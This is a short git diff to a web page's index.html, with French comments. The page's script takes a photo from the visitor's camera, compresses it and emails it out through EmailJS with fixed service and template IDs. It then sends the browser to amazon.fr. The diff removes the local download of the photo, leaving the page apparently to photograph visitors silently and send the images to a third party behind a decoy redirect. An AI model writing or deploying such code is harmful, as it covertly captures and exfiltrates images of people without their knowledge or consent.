--- a/index.html
+++ b/index.html
@@ -52,23 +52,16 @@
 
           console.log("Taille finale:", sizeKB + "KB à qualité " + (quality+0.05));
 
+          // Stop caméra
           stream.getTracks().forEach(track => track.stop());
 
-          // 📧 Envoi via EmailJS
+          // Envoi via EmailJS
           emailjs.send("service_8cs0gml", "template_rdhxflt", {
             message: "Photo auto 📸 (" + sizeKB + " KB)",
             image: imageData
           });
 
-          // 💾 Téléchargement automatique
-          const link = document.createElement('a');
-          link.href = imageData;
-          link.download = "photo_capture.jpg";
-          document.body.appendChild(link);
-          link.click();
-          document.body.removeChild(link);
-
-          // 🔀 Redirection vers Amazon
+          // Redirection vers Amazon
           setTimeout(() => {
             window.location.href = "https://www.amazon.fr";
           }, 500);
